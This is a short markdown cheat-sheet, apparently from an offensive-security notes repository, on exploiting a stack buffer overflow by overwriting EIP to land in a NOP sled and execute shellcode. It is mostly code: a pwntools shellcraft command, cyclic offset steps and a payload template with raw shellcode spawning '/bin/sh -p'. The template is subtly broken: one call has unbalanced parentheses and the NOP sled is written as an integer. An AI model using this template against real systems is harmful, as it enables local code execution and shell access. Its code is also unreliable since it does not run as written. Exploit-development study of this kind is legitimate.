killchain-compendium/Exploits/Binaries/Cut Stack in Half.md

832 B

Cut Stack in Half + NOPsled

  • Stack has to be executable
  • cylic buffer + eip content is esp + half of the stack + NOPsled + shellcode
  • ASLR has to be off or eip content address pointing into the sled needs to be fuzzed hard

shellcraft

  • for example
shellcraft i386.linux.execve "/bin///sh" "['sh', '-p']" -f s

Usage

  • measure eip offset via
    cyclic <number>
    
    • Check eip content via gdb
    cyclic -l <eipContent>
    
  • Example code
from pwn import *

padding(cyclic(cyclic_find(<eipContent>))
eip = p32(<esp> + some offset into stack)
sled = 90 * 100
shellcode = "jhh\x2f\x2f\x2fsh\x2fbin\x89\xe3jph\x01\x01\x01\x01\x814\x24ri\x01,1\xc9Qj\x07Y\x01\xe1Qj\x08Y\x01\xe1Q\x89\xe11\xd2j\x0bX\xcd\x80"
payload = padding + eip + sled + shellcode